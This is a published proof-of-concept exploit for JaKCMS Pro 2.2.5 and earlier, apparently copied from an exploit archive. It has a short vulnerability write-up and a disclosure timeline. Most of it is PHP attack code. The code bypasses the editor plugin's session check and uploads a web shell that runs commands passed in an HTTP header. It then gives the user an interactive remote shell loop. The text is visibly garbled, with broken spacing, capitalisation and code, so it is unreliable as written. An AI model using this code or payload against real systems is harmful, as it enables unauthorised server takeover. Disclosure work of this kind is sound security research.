Title: jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit
Author: EgiX
: Http://www.jakcms.com/
Affected Version n: 2.2.5
Test Platform: Windows 7 and Debian 6.0.2
<? Php
/*
--------------------------------------------------------
Jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit
--------------------------------------------------------
Author ......: EgiX
Mail ......: n0b0d13s [at] gmail [dot] com
Software link...: http://www.jakcms.com/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] Vulnerable code in/js/editor/plugins/jakadminexplorer/php/session. php
119. if ($ SESSION ["check_session_variable"]! = ""){
120.
121. // Session Starten
122. session_start ();
123.
124. // Session-Variable ü berpr ü fen
125. if (! Isset ($ _ SESSION [$ SESSION ["check_session_variable"]) {
Www.2cto.com
126. include ("error. php ");
127. die;
128 .}
129 .}
This authentication schema cocould be bypassed due to an attacker might be able to start a session accessing to/index. php that set
For e.g. the "jak_lastURL" session variable, so cocould be set $ SESSION ["check_session_variable"] to bypass the check at line 125.
Successful exploitation allows attackers access to plugins functionality (see/js/editor/plugins/jakadminexplorer/php/action. php ),
In this way an attacker cocould be able to "delete", "create", "rename" any folder/file into webserver or upload arbitrary files.
The same vulnerability afflicts also jakadminimage, jakusrexplorer and jakusrimage plugins.
[-] Disclosure timeline:
[15/09/2011]-Vulnerability discovered
[16/09/2011]-Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager
[16/09/2011]-Vendor fix released in version 2.2.6
[21/09/2011]-Public disclosure
*/
Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );
Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No response from {$ host}: 80 \ n ");
Fputs ($ sock, $ packet );
Return stream_get_contents ($ sock );
}
Function RC4 ($ data)
{
$ Key = "success ";
$ S = range (1, 0,256 );
$ J = 0;
For ($ I = 0; I I <256; $ I ++)
{
$ J = ($ j + $ s [$ I] + ord ($ key [$ I % strlen ($ key)]) % 256;
$ X = $ s [$ I];
$ S [$ I] = $ s [$ j];
$ S [$ j] = $ x;
}
$ I = $ j = 0;
$ Ct = "";
For ($ y = 0; $ y <strlen ($ data); $ y ++)
{
$ I = ($ I + 1) % 256;
$ J = ($ j + $ s [$ I]) % 256;
$ X = $ s [$ I];
$ S [$ I] = $ s [$ j];
$ S [$ j] = $ x;
$ Ct. = $ data [$ y] ^ chr ($ s [($ s [$ I] + $ s [$ j]) % 256]);
}
Return $ ct;
}
Print "\ n + ------------------------------------------------------------------ + ";
Print "\ n | jakcms pro <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX | ";
Print "\ n + ------------------------------------------------------------------ + \ n ";
If ($ argc <3)
{
Print "\ nUsage...: php $ argv [0]
Print "\ nExample...: php $ argv [0] localhost /";
Print "\ nExample...: php $ argv [0] localhost/jakcms/\ n ";
Die ();
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Packet = "GET {$ path} HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
Preg_match ("/PHPSESSID = ([^;] *);/I", http_send ($ host, $ packet), $ m );
$ Sid = $ m [1];
$ Payload = "-- o0oOo0o \ r \ n ";
$ Payload. = "Content-Disposition: form-data; name = \" edit1 \ "\ r \ n. php \ r \ n ";
$ Payload. = "-- o0oOo0o \ r \ n ";
$ Payload. = "Content-Disposition: form-data; name = \" input1 \ "; filename = \" foo \ "\ r \ n ";
$ Payload. = "<? Php \ $ {error_reporting (0)}. \ $ {print (_ code _)}. \ $ {passthru (base64_decode (\ $ _ SERVER [HTTP_CMD])}?> \ R \ n ";
$ Payload. = "-- o0oOo0o -- \ r \ n ";
$ Get = bin2hex (RC4 ("id = 1 & check_session_variable = jak_lastURL & upload_filetype = php & dir = {$ path} cache/sh "));
$ Packet = "POST {$ path} js/editor/plugins/jakadminexplorer /? Action = upload & get = {$ get} HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cookie: PHPSESSID ={$ sid} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: multipart/form-data; boundary = o0oOo0o \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
$ Packet. = $ payload;
If (preg_match ("/Error/", http_send ($ host, $ packet) die ("\ n [-] Upload failed! \ N ");
$ Packet = "GET {$ path} cache/sh. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
While (1)
{
Print "\ njakcms-shell #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
Preg_match ("/_ code _ (. *)/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )? Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>